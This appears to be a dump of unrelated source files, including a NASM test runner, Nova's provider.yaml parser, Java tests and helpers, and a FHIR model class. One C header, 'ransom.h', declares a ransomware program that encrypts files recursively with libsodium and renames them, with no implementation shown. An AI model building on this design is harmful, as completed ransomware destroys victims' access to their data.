for t in desc['target']:
if 'output' in t:
if 'option' in t:
opts += t['option'].split(" ") + [desc['_base-dir'] + os.sep + t['output']]
else:
opts += ['-o', desc['_base-dir'] + os.sep + t['output']]
if 'stdout' in t or 'stderr' in t:
if 'option' in t:
opts += t['option'].split(" ")
if 'source' in desc:
opts += [desc['_base-dir'] + os.sep + desc['source']]
return opts
def exec_nasm(desc):
print("\tProcessing %s" % (desc['_test-name']))
opts = [args.nasm] + prepare_run_opts(desc)
nasm_env = os.environ.copy()
nasm_env['NASM_TEST_RUN'] = 'y'
desc_env = desc.get('environ')
if desc_env:
for i in desc_env:
v = i.split('=')
if len(v) == 2:
nasm_env[v[0]] = v[1]
else:
nasm_env[v[0]] = None
print("\tExecuting %s" % (" ".join(opts)))
pnasm = subprocess.Popen(opts,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
close_fds = True,
env = nasm_env)
if pnasm == None:
test_fail(desc['_test-name'], "Unable to execute test")
return None
stderr = pnasm.stderr.read(4194304).decode("utf-8").strip("\n")
stdout = pnasm.stdout.read(4194304).decode("utf-8").strip("\n")
pnasm.stdout.close()
pnasm.stderr.close()
wait_rc = pnasm.wait();
if desc['_wait'] != wait_rc:
if stdout != "":
show_std("stdout", stdout)
if stderr != "":
show_std("stderr", stderr)
test_fail(desc['_test-name'],
"Unexpected ret code: " + str(wait_rc))
return None, None, None
return pnasm, stdout, stderr
def test_run(desc):
print("=== Running %s ===" % (desc['_test-name']))
pnasm, stdout, stderr = exec_nasm(desc)
if pnasm == None:
return False
for t in desc['target']:
if 'output' in t:
output = desc['_base-dir'] + os.sep + t['output']
match = desc['_base-dir'] + os.sep + t['match']
if desc['_wait'] == 1:
continue
print("\tComparing %s %s" % (output, match))
if filecmp.cmp(match, output) == False:
show_diff(desc['_test-name'], match, output)
return test_fail(desc['_test-name'], match + " and " + output + " files are different")
elif 'stdout' in t:
print("\tComparing stdout")
match = desc['_base-dir'] + os.sep + t['stdout']
match_data = read_stdfile(match)
if match_data == None:
return test_fail(test, "Can't read " + match)
if cmp_std(match, match_data, 'stdout', stdout) == False:
return test_fail(desc['_test-name'], "Stdout mismatch")
else:
stdout = ""
elif 'stderr' in t:
print("\tComparing stderr")
match = desc['_base-dir'] + os.sep + t['stderr']
match_data = read_stdfile(match)
if match_data == None:
return test_fail(test, "Can't read " + match)
if cmp_std(match, match_data, 'stderr', stderr) == False:
return test_fail(desc['_test-name'], "Stderr mismatch")
else:
stderr = ""
if stdout != "":
show_std("stdout", stdout)
return test_fail(desc['_test-name'], "Stdout is not empty")
if stderr != "":
show_std("stderr", stderr)
return test_fail(desc['_test-name'], "Stderr is not empty")
return test_pass(desc['_test-name'])
#
# Compile sources and generate new targets
def test_update(desc):
print("=== Updating %s ===" % (desc['_test-name']))
if 'update' in desc and desc['update'] == 'false':
return test_skip(desc['_test-name'], "No output provided")
pnasm, stdout, stderr = exec_nasm(desc)
if pnasm == None:
return False
for t in desc['target']:
if 'output' in t:
output = desc['_base-dir'] + os.sep + t['output']
match = desc['_base-dir'] + os.sep + t['match']
print("\tMoving %s to %s" % (output, match))
os.rename(output, match)
if 'stdout' in t:
match = desc['_base-dir'] + os.sep + t['stdout']
print("\tMoving %s to %s" % ('stdout', match))
with open(match, "wb") as f:
f.write(stdout.encode("utf-8"))
f.close()
if 'stderr' in t:
match = desc['_base-dir'] + os.sep + t['stderr']
print("\tMoving %s to %s" % ('stderr', match))
with open(match, "wb") as f:
f.write(stderr.encode("utf-8"))
f.close()
return test_updated(desc['_test-name'])
if args.cmd == 'run':
desc_array = []
if args.test == None:
desc_array = collect_test_desc_from_dir(args.dir)
else:
desc_array = collect_test_desc_from_file(args.test)
if len(desc_array) == 0:
test_abort(args.test, "Can't obtain test descriptors")
for desc in desc_array:
if test_run(desc) == False:
if 'error' in desc and desc['error'] == 'over':
test_over(desc['_test-name'])
else:
test_abort(desc['_test-name'], "Error detected")
if args.cmd == 'update':
desc_array = []
if args.test == None:
desc_array = collect_test_desc_from_dir(args.dir)
else:
desc_array = collect_test_desc_from_file(args.test)
if len(desc_array) == 0:
test_abort(args.test, "Can't obtain a test descriptors")
for desc in desc_array:
if test_update(desc) == False:
if 'error' in desc and desc['error'] == 'over':
test_over(desc['_test-name'])
else:
test_abort(desc['_test-name'], "Error detected")
| 6,740 |
1,874 | <filename>nova/compute/provider_config.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import jsonschema
import logging
import microversion_parse
import os
import yaml
import os_resource_classes
import os_traits
from nova import exception as nova_exc
from nova.i18n import _
LOG = logging.getLogger(__name__)
# A dictionary with keys for all supported major versions with lists of
# corresponding minor versions as values.
SUPPORTED_SCHEMA_VERSIONS = {
1: {0}
}
# Supported provider config file schema
SCHEMA_V1 = {
# This defintion uses JSON Schema Draft 7.
# https://json-schema.org/draft-07/json-schema-release-notes.html
'type': 'object',
'properties': {
# This property is used to track where the provider.yaml file
# originated. It is reserved for internal use and should never be
# set in a provider.yaml file supplied by an end user.
'__source_file': {'not': {}},
'meta': {
'type': 'object',
'properties': {
# Version ($Major, $minor) of the schema must successfully
# parse documents conforming to ($Major, 0..N).
# Any breaking schema change (e.g. removing fields, adding
# new required fields, imposing a stricter pattern on a value,
# etc.) must bump $Major.
'schema_version': {
'type': 'string',
'pattern': '^1.([0-9]|[1-9][0-9]+)$'
}
},
'required': ['schema_version'],
'additionalProperties': True
},
'providers': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'identification': {
'$ref': '#/$defs/providerIdentification'
},
'inventories': {
'$ref': '#/$defs/providerInventories'
},
'traits': {
'$ref': '#/$defs/providerTraits'
}
},
'required': ['identification'],
'additionalProperties': True
}
}
},
'required': ['meta'],
'additionalProperties': True,
'$defs': {
'providerIdentification': {
# Identify a single provider to configure.
# Exactly one identification method should be used. Currently
# `uuid` or `name` are supported, but future versions may
# support others. The uuid can be set to the sentinel value
# `$COMPUTE_NODE` which will cause the consuming compute service to
# apply the configuration to all compute node root providers
# it manages that are not otherwise specified using a uuid or name.
'type': 'object',
'properties': {
'uuid': {
'oneOf': [
{
# TODO(sean-k-mooney): replace this with type uuid
# when we can depend on a version of the jsonschema
# lib that implements draft 8 or later of the
# jsonschema spec.
'type': 'string',
'pattern':
'^[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{12}$'
},
{
'type': 'string',
'const': '$COMPUTE_NODE'
}
]
},
'name': {
'type': 'string',
'minLength': 1,
'maxLength': 200
}
},
# This introduces the possibility of an unsupported key name being
# used to get by schema validation, but is necessary to support
# forward compatibility with new identification methods.
# This should be checked after schema validation.
'minProperties': 1,
'maxProperties': 1,
'additionalProperties': False
},
'providerInventories': {
# Allows the admin to specify various adjectives to create and
# manage providers' inventories. This list of adjectives can be
# extended in the future as the schema evolves to meet new use
# cases. As of v1.0, only one adjective, `additional`, is
# supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
'patternProperties': {
# Allows any key name matching the resource class
# pattern, check to prevent conflicts with virt
# driver owned resouces classes will be done after
# schema validation.
'^[A-Z0-9_]{1,255}$': {
'type': 'object',
'properties': {
# Any optional properties not populated
# will be given a default value by
# placement. If overriding a pre-existing
# provider values will not be preserved
# from the existing inventory.
'total': {
'type': 'integer'
},
'reserved': {
'type': 'integer'
},
'min_unit': {
'type': 'integer'
},
'max_unit': {
'type': 'integer'
},
'step_size': {
'type': 'integer'
},
'allocation_ratio': {
'type': 'number'
}
},
'required': ['total'],
# The defined properties reflect the current
# placement data model. While defining those
# in the schema and not allowing additional
# properties means we will need to bump the
# schema version if they change, that is likely
# to be part of a large change that may have
# other impacts anyway. The benefit of stricter
# validation of property names outweighs the
# (small) chance of having to bump the schema
# version as described above.
'additionalProperties': False
}
},
# This ensures only keys matching the pattern
# above are allowed.
'additionalProperties': False
}
}
},
'additionalProperties': True
},
'providerTraits': {
# Allows the admin to specify various adjectives to create and
# manage providers' traits. This list of adjectives can be extended
# in the future as the schema evolves to meet new use cases.
# As of v1.0, only one adjective, `additional`, is supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
# Allows any value matching the trait pattern here,
# additional validation will be done after schema
# validation.
'type': 'string',
'pattern': '^[A-Z0-9_]{1,255}$'
}
}
},
'additionalProperties': True
}
}
}
def _load_yaml_file(path):
"""Loads and parses a provider.yaml config file into a dict.
:param path: Path to the yaml file to load.
:return: Dict representing the yaml file requested.
:raise: ProviderConfigException if the path provided cannot be read
or the file is not valid yaml.
"""
try:
with open(path) as open_file:
try:
return yaml.safe_load(open_file)
except yaml.YAMLError as ex:
message = _("Unable to load yaml file: %s ") % ex
if hasattr(ex, 'problem_mark'):
pos = ex.problem_mark
message += _("File: %s ") % open_file.name
message += _("Error position: (%s:%s)") % (
pos.line + 1, pos.column + 1)
raise nova_exc.ProviderConfigException(error=message)
except OSError:
message = _("Unable to read yaml config file: %s") % path
raise nova_exc.ProviderConfigException(error=message)
def _validate_provider_config(config, provider_config_path):
"""Accepts a schema-verified provider config in the form of a dict and
performs additional checks for format and required keys.
:param config: Dict containing a provider config file
:param provider_config_path: Path to the provider config, used for logging
:return: List of valid providers
:raise nova.exception.ProviderConfigException: If provider id is missing,
or a resource class or trait name is invalid.
"""
def _validate_traits(provider):
# Check that traits are custom
additional_traits = set(provider.get("traits", {}).get(
"additional", []))
trait_conflicts = [trait for trait in additional_traits
if not os_traits.is_custom(trait)]
if trait_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid traits, only custom traits are allowed: %s"
) % sorted(trait_conflicts)
raise nova_exc.ProviderConfigException(error=message)
return additional_traits
def _validate_rc(provider):
# Check that resource classes are custom
additional_inventories = provider.get("inventories", {}).get(
"additional", [])
all_inventory_conflicts = []
for inventory in additional_inventories:
inventory_conflicts = [rc for rc in inventory
if not os_resource_classes.is_custom(rc)]
all_inventory_conflicts += inventory_conflicts
if all_inventory_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid resource class, only custom resource classes "
"are allowed: %s") % ', '.join(sorted(all_inventory_conflicts))
raise nova_exc.ProviderConfigException(error=message)
return additional_inventories
# store valid providers
valid_providers = []
for provider in config.get("providers", []):
# Check that the identification method is known since
# the schema only requires that some property be present
pid = provider["identification"]
provider_id = pid.get("name") or pid.get("uuid")
# Not checking the validity of provider_id since
# the schema has already ensured that.
additional_traits = _validate_traits(provider)
additional_inventories = _validate_rc(provider)
# filter out no-op providers so they will not be returned
if not additional_traits and not additional_inventories:
message = (
"Provider %(provider_id)s defined in %(provider_config_path)s "
"has no additional inventories or traits and will be ignored."
) % {
"provider_id": provider_id,
"provider_config_path": provider_config_path
}
LOG.warning(message)
else:
valid_providers.append(provider)
return valid_providers
def _parse_provider_yaml(path):
"""Loads schema, parses a provider.yaml file and validates the content.
:param path: File system path to the file to parse.
:return: dict representing the contents of the file.
:raise ProviderConfigException: If the specified file does
not validate against the schema, the schema version is not supported,
or if unable to read configuration or schema files.
"""
yaml_file = _load_yaml_file(path)
try:
schema_version = microversion_parse.parse_version_string(
yaml_file['meta']['schema_version'])
except (KeyError, TypeError):
message = _("Unable to detect schema version: %s") % yaml_file
raise nova_exc.ProviderConfigException(error=message)
if schema_version.major not in SUPPORTED_SCHEMA_VERSIONS:
message = _(
"Unsupported schema major version: %d") % schema_version.major
raise nova_exc.ProviderConfigException(error=message)
if schema_version.minor not in \
SUPPORTED_SCHEMA_VERSIONS[schema_version.major]:
# TODO(sean-k-mooney): We should try to provide a better
# message that identifies which fields may be ignored
# and the max minor version supported by this version of nova.
message = (
"Provider config file [%(path)s] is at schema version "
"%(schema_version)s. Nova supports the major version, "
"but not the minor. Some fields may be ignored."
% {"path": path, "schema_version": schema_version})
LOG.warning(message)
try:
jsonschema.validate(yaml_file, SCHEMA_V1)
except jsonschema.exceptions.ValidationError as e:
message = _(
"The provider config file %(path)s did not pass validation "
"for schema version %(schema_version)s: %(reason)s") % {
"path": path, "schema_version": schema_version, "reason": e}
raise nova_exc.ProviderConfigException(error=message)
return yaml_file
def get_provider_configs(provider_config_dir):
"""Gathers files in the provided path and calls the parser for each file
and merges them into a list while checking for a number of possible
conflicts.
:param provider_config_dir: Path to a directory containing provider config
files to be loaded.
:raise nova.exception.ProviderConfigException: If unable to read provider
config directory or if one of a number of validation checks fail:
- Unknown, unsupported, or missing schema major version.
- Unknown, unsupported, or missing resource provider identification.
- A specific resource provider is identified twice with the same
method. If the same provider identified by *different* methods,
such conflict will be detected in a later stage.
- A resource class or trait name is invalid or not custom.
- A general schema validation error occurs (required fields,
types, etc).
:return: A dict of dicts keyed by uuid_or_name with the parsed and
validated contents of all files in the provided dir. Each value in the dict
will include the source file name the value of the __source_file key.
"""
provider_configs = {}
provider_config_paths = glob.glob(
os.path.join(provider_config_dir, "*.yaml"))
provider_config_paths.sort()
if not provider_config_paths:
message = (
"No provider configs found in %s. If files are present, "
"ensure the Nova process has access."
)
LOG.info(message, provider_config_dir)
# return an empty dict as no provider configs found
return provider_configs
for provider_config_path in provider_config_paths:
provider_config = _parse_provider_yaml(provider_config_path)
for provider in _validate_provider_config(
provider_config, provider_config_path,
):
provider['__source_file'] = os.path.basename(provider_config_path)
pid = provider["identification"]
uuid_or_name = pid.get("uuid") or pid.get("name")
# raise exception if this provider was already processed
if uuid_or_name in provider_configs:
raise nova_exc.ProviderConfigException(
error=_(
"Provider %(provider_id)s has multiple definitions "
"in source file(s): %(source_files)s."
) % {
"provider_id": uuid_or_name,
# sorted set for deduplication and consistent order
"source_files": sorted({
provider_configs[uuid_or_name]["__source_file"],
provider_config_path
})
}
)
provider_configs[uuid_or_name] = provider
return provider_configs
| 8,910 |
313 | /*
* Copyright 2018 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.util.rx;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Supplier;
import com.jayway.awaitility.Awaitility;
import org.junit.Test;
import rx.Producer;
import rx.Subscriber;
import rx.Subscription;
import static org.assertj.core.api.Assertions.assertThat;
public class ValueGeneratorTest {
@Test
public void testSimpleValueGeneration() throws Exception {
final int limit = 100;
AtomicInteger valueSource = new AtomicInteger();
AtomicInteger emitCounter = new AtomicInteger();
CountDownLatch latch = new CountDownLatch(1);
Subscription subscription = ObservableExt.generatorFrom(valueSource::getAndIncrement).subscribe(new Subscriber<Integer>() {
private Producer producer;
@Override
public void setProducer(Producer p) {
this.producer = p;
p.request(1);
}
@Override
public void onCompleted() {
latch.countDown();
}
@Override
public void onError(Throwable e) {
latch.countDown();
e.printStackTrace();
}
@Override
public void onNext(Integer integer) {
if (emitCounter.incrementAndGet() < limit) {
producer.request(1);
} else {
unsubscribe();
latch.countDown();
}
}
});
latch.await();
assertThat(emitCounter.get()).isEqualTo(limit);
Awaitility.await().timeout(5, TimeUnit.SECONDS).until(subscription::isUnsubscribed);
}
@Test
public void testFailureInValueProviderIsPropagatedToSubscriber() throws Exception {
Supplier<Integer> failingSupplier = () -> {
throw new RuntimeException("simulated error");
};
AtomicReference<Throwable> errorRef = new AtomicReference<>();
CountDownLatch latch = new CountDownLatch(1);
Subscription subscription = ObservableExt.generatorFrom(failingSupplier).subscribe(new Subscriber<Integer>() {
@Override
public void setProducer(Producer p) {
p.request(1);
}
@Override
public void onCompleted() {
latch.countDown();
}
@Override
public void onError(Throwable e) {
errorRef.set(e);
latch.countDown();
}
@Override
public void onNext(Integer integer) {
}
});
latch.await();
Awaitility.await().timeout(5, TimeUnit.SECONDS).until(subscription::isUnsubscribed);
assertThat(errorRef.get()).hasMessageContaining("simulated error");
}
} | 1,525 |
818 | /*
* Copyright 2021 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.process.instance.impl.humantask;
import java.io.Serializable;
import java.nio.file.Paths;
import java.util.Date;
import java.util.Map;
import java.util.UUID;
import org.jbpm.workflow.instance.node.WorkItemNodeInstance;
import org.kie.kogito.MapOutput;
import org.kie.kogito.internal.process.runtime.KogitoNodeInstance;
import org.kie.kogito.internal.process.runtime.KogitoWorkItem;
import org.kie.kogito.internal.process.runtime.WorkItemNotFoundException;
import org.kie.kogito.process.ProcessInstance;
import org.kie.kogito.process.workitem.Attachment;
import org.kie.kogito.process.workitem.AttachmentInfo;
import org.kie.kogito.process.workitem.Comment;
import org.kie.kogito.process.workitem.HumanTaskWorkItem;
import org.kie.kogito.process.workitem.Policy;
import org.kie.kogito.process.workitem.TaskMetaEntity;
public class HumanTaskHelper {
private HumanTaskHelper() {
}
public static HumanTaskWorkItemImpl asHumanTask(KogitoWorkItem item) {
if (item instanceof HumanTaskWorkItemImpl) {
return (HumanTaskWorkItemImpl) item;
} else {
throw new IllegalArgumentException("Work item " + item.getStringId() + " is not a human task");
}
}
public static Comment addComment(KogitoWorkItem item, String commentInfo, String user) {
HumanTaskWorkItemImpl humanTask = asHumanTask(item);
Object id = getNewId();
Comment comment = buildComment(id, commentInfo, user);
humanTask.getComments().put(id, comment);
return comment;
}
public static Attachment addAttachment(KogitoWorkItem item, AttachmentInfo attachmentInfo, String user) {
HumanTaskWorkItemImpl humanTask = asHumanTask(item);
Object id = getNewId();
Attachment attachment = buildAttachment(id, attachmentInfo, user);
humanTask.getAttachments().put(id, attachment);
return attachment;
}
public static Comment updateComment(KogitoWorkItem item, Object id, String commentInfo, String user) {
Comment comment = asHumanTask(item).getComments().get(id);
if (comment == null) {
throw new IllegalArgumentException("Comment " + id + " does not exist");
}
if (!comment.getUpdatedBy().equals(user)) {
throw new IllegalArgumentException("User " + user + " did not create the comment, cannot modify it");
}
return fillTaskMetaEntity(comment, commentInfo);
}
public static Attachment updateAttachment(KogitoWorkItem item,
Object id,
AttachmentInfo attachmentInfo,
String user) {
Attachment attachment = asHumanTask(item).getAttachments().get(id);
if (attachment == null) {
throw new IllegalArgumentException("Attachment " + id + " does not exist");
}
if (!attachment.getUpdatedBy().equals(user)) {
throw new IllegalArgumentException("User " + user + " did not create the attachment, cannot modify it");
}
return setAttachmentName(fillTaskMetaEntity(attachment, attachmentInfo.getUri()), attachmentInfo);
}
public static Map<String, Object> updateContent(KogitoWorkItem item, MapOutput model) {
HumanTaskWorkItemImpl humanTask = asHumanTask(item);
humanTask.setResults(model.toMap());
return humanTask.getResults();
}
public static boolean deleteComment(KogitoWorkItem item, Object id, String user) {
Map<Object, Comment> comments = asHumanTask(item).getComments();
Comment comment = comments.get(id);
if (comment == null || !comment.getUpdatedBy().equals(user)) {
return false;
}
return comments.remove(id) != null;
}
public static boolean deleteAttachment(KogitoWorkItem item, Object id, String user) {
Map<Object, Attachment> attachments = asHumanTask(item).getAttachments();
Attachment attachment = attachments.get(id);
if (attachment == null || !attachment.getUpdatedBy().equals(user)) {
return false;
}
return attachments.remove(id) != null;
}
public static HumanTaskWorkItem findTask(ProcessInstance<?> pi, String taskId, Policy<?>... policies) {
return pi.findNodes(ni -> isSearchWorkItem(ni, taskId,
policies)).stream().findFirst().map(wi -> (HumanTaskWorkItem) ((WorkItemNodeInstance) wi).getWorkItem())
.orElseThrow(() -> new WorkItemNotFoundException(taskId));
}
private static boolean isSearchWorkItem(KogitoNodeInstance ni, String taskId, Policy<?>... policies) {
return ni instanceof WorkItemNodeInstance && ((WorkItemNodeInstance) ni).getWorkItemId().equals(
taskId) && ((WorkItemNodeInstance) ni).getWorkItem().enforce(policies) &&
((WorkItemNodeInstance) ni).getWorkItem() instanceof HumanTaskWorkItem;
}
private static Comment buildComment(Object id, String content, String user) {
return fillTaskMetaEntity(new Comment(id, user), content);
}
private static Attachment buildAttachment(Object id, AttachmentInfo attachmentInfo, String user) {
return setAttachmentName(fillTaskMetaEntity(new Attachment(id, user), attachmentInfo.getUri()), attachmentInfo);
}
private static Attachment setAttachmentName(Attachment attachment, AttachmentInfo attachmentInfo) {
String name = attachmentInfo.getName();
if (name == null) {
name = Paths.get(attachmentInfo.getUri()).getFileName().toString();
}
attachment.setName(name);
return attachment;
}
private static <T extends Serializable, C extends TaskMetaEntity<T>> C fillTaskMetaEntity(C metaInfo,
T content) {
metaInfo.setUpdatedAt(new Date());
metaInfo.setContent(content);
return metaInfo;
}
private static Object getNewId() {
return UUID.randomUUID().toString();
}
}
| 2,336 |
333 | /*
** EPITECH PROJECT, 2021
** RANSOM_H_
** File description:
** ransom
*/
#ifndef RANSOM_H_
#define RANSOM_H_
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <sodium.h>
#include <sys/types.h>
#include <dirent.h>
#include <unistd.h>
#include <pwd.h>
#include <stdbool.h>
#include <sodium.h>
#include <sodium/crypto_pwhash.h>
#include <sodium/crypto_secretstream_xchacha20poly1305.h>
#include <sodium/utils.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define MAX_FILEPATH 256
#define MAX_KEY_LEN crypto_secretstream_xchacha20poly1305_KEYBYTES
#define SALT_LEN crypto_pwhash_SALTBYTES
#define CHUNK_SIZE 4096
#define ENCRYPT (0)
#define DECRYPT (1)
typedef struct cryptalgo_s cryptalgo_t;
struct cryptalgo_s {
void (*format_filename)(const char *filename, char *new_filename);
bool (*skip_paths)(const char *path);
bool (*init_cryptalgo)(FILE **f1, FILE **f2, const char *oldfilename, const char *new_filename);
int (*manage_header)(unsigned char *generated_key, FILE **f1, FILE **f2,
crypto_secretstream_xchacha20poly1305_state *st);
int (*loop)(FILE *f1, FILE *f2, crypto_secretstream_xchacha20poly1305_state st);
};
// algo.c
int core(const char *password,
const char *filepath, const char *optfilepath, cryptalgo_t algo);
int graceful_exit(FILE *f1, FILE *f2, unsigned char *generated_key, int ret);
// encryption.c
bool init_encryption(FILE **to_encrypt, FILE **encrypted,
const char *filepath, const char *optfilepath);
int write_header(unsigned char *generated_key, FILE **to_encrypt,
FILE **encrypted, crypto_secretstream_xchacha20poly1305_state *st);
int encryption_loop(FILE *to_encrypt, FILE *encrypted,
crypto_secretstream_xchacha20poly1305_state st);
// decryption.c
bool init_decryption(FILE **to_decrypt, FILE **decrypted,
const char *filepath, const char *optfilepath);
int read_header(unsigned char *generated_key,
FILE **to_decrypt, FILE **decrypted, crypto_secretstream_xchacha20poly1305_state *st);
int decryption_loop(FILE *to_decrypt, FILE *decrypted,
crypto_secretstream_xchacha20poly1305_state st);
// ransom.c
bool skip_already_decrypted(const char *path);
bool skip_already_encrypted(const char *path);
int iter_recursively_through_files(char *path, char *password,
cryptalgo_t);
void get_new_path_name(char *parentPath, char *finalPath, char *currentPath);
void add_file_extension(const char *fileName, char *optFileName);
void remove_file_extension(const char *filename, char *optfilename);
static const cryptalgo_t cryptalgo[] = {
[ENCRYPT] = {
add_file_extension,
skip_already_encrypted,
init_encryption,
write_header,
encryption_loop
},
[DECRYPT] = {
remove_file_extension,
skip_already_decrypted,
init_decryption,
read_header,
decryption_loop
},
};
#endif /* RANSOM_H_ */
| 1,144 |
474 | package com.thinkkeep.videolib.di.component;
import android.content.Context;
import com.thinkkeep.videolib.api.EvilsLiveStreamer;
import com.thinkkeep.videolib.di.modules.CameraModule;
import dagger.Component;
/**
* Created by jason on 17/2/27.
*/
@Component(modules = CameraModule.class)
public interface CameraComponent {
void inject(EvilsLiveStreamer streamer);
final class Initializer {
private Initializer() {
} // No instance
public static CameraComponent init(Context context) {
return DaggerCameraComponent.builder()
.cameraModule(new CameraModule(context)).build();
}
}
}
| 239 |
3,212 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.distributed.cache.client;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Set;
/**
* Utility class to abstract serialization logic from network byte stream operations.
*/
public class CacheClientSerde {
/**
* Serialize a value of the given type.
*
* @param value the value to be serialized
* @param serializer the serializer for the input value
* @param <T> the value type
* @return the byte stream representation of the input value
* @throws IOException on serialization failure
*/
public static <T> byte[] serialize(final T value, final Serializer<T> serializer) throws IOException {
final ByteArrayOutputStream os = new ByteArrayOutputStream();
serializer.serialize(value, os);
return os.toByteArray();
}
/**
* Serialize a collection of values of the given type.
*
* @param values the values to be serialized
* @param serializer the serializer for the input values
* @param <T> the value type
* @return a collection of the byte stream representations of the input values
* @throws IOException on serialization failure
*/
public static <T> Collection<byte[]> serialize(final Set<T> values, final Serializer<T> serializer) throws IOException {
final Collection<byte[]> bytesValues = new ArrayList<>();
final ByteArrayOutputStream os = new ByteArrayOutputStream();
for (T value : values) {
serializer.serialize(value, os);
bytesValues.add(os.toByteArray());
os.reset();
}
return bytesValues;
}
}
| 804 |
418 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/SubstanceNucleicAcid) on 2019-05-07.
# 2019, SMART Health IT.
from . import domainresource
class SubstanceNucleicAcid(domainresource.DomainResource):
""" Nucleic acids are defined by three distinct elements: the base, sugar and
linkage. Individual substance/moiety IDs will be created for each of these
elements. The nucleotide sequence will be always entered in the 5’-3’
direction.
"""
resource_type = "SubstanceNucleicAcid"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.areaOfHybridisation = None
""" The area of hybridisation shall be described if applicable for
double stranded RNA or DNA. The number associated with the subunit
followed by the number associated to the residue shall be specified
in increasing order. The underscore “” shall be used as separator
as follows: “Subunitnumber Residue”.
Type `str`. """
self.numberOfSubunits = None
""" The number of linear sequences of nucleotides linked through
phosphodiester bonds shall be described. Subunits would be strands
of nucleic acids that are tightly associated typically through
Watson-Crick base pairing. NOTE: If not specified in the reference
source, the assumption is that there is 1 subunit.
Type `int`. """
self.oligoNucleotideType = None
""" (TBC).
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequenceType = None
""" The type of the sequence shall be specified based on a controlled
vocabulary.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.subunit = None
""" Subunits are listed in order of decreasing length; sequences of the
same length will be ordered by molecular weight; subunits that have
identical sequences will be repeated multiple times.
List of `SubstanceNucleicAcidSubunit` items (represented as `dict` in JSON). """
super(SubstanceNucleicAcid, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(SubstanceNucleicAcid, self).elementProperties()
js.extend([
("areaOfHybridisation", "areaOfHybridisation", str, False, None, False),
("numberOfSubunits", "numberOfSubunits", int, False, None, False),
("oligoNucleotideType", "oligoNucleotideType", codeableconcept.CodeableConcept, False, None, False),
("sequenceType", "sequenceType", codeableconcept.CodeableConcept, False, None, False),
("subunit", "subunit", SubstanceNucleicAcidSubunit, True, None, False),
])
return js
from . import backboneelement
class SubstanceNucleicAcidSubunit(backboneelement.BackboneElement):
""" Subunits are listed in order of decreasing length; sequences of the same
length will be ordered by molecular weight; subunits that have identical
sequences will be repeated multiple times.
"""
resource_type = "SubstanceNucleicAcidSubunit"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.fivePrime = None
""" The nucleotide present at the 5’ terminal shall be specified based
on a controlled vocabulary. Since the sequence is represented from
the 5' to the 3' end, the 5’ prime nucleotide is the letter at the
first position in the sequence. A separate representation would be
redundant.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.length = None
""" The length of the sequence shall be captured.
Type `int`. """
self.linkage = None
""" The linkages between sugar residues will also be captured.
List of `SubstanceNucleicAcidSubunitLinkage` items (represented as `dict` in JSON). """
self.sequence = None
""" Actual nucleotide sequence notation from 5' to 3' end using
standard single letter codes. In addition to the base sequence,
sugar and type of phosphate or non-phosphate linkage should also be
captured.
Type `str`. """
self.sequenceAttachment = None
""" (TBC).
Type `Attachment` (represented as `dict` in JSON). """
self.subunit = None
""" Index of linear sequences of nucleic acids in order of decreasing
length. Sequences of the same length will be ordered by molecular
weight. Subunits that have identical sequences will be repeated and
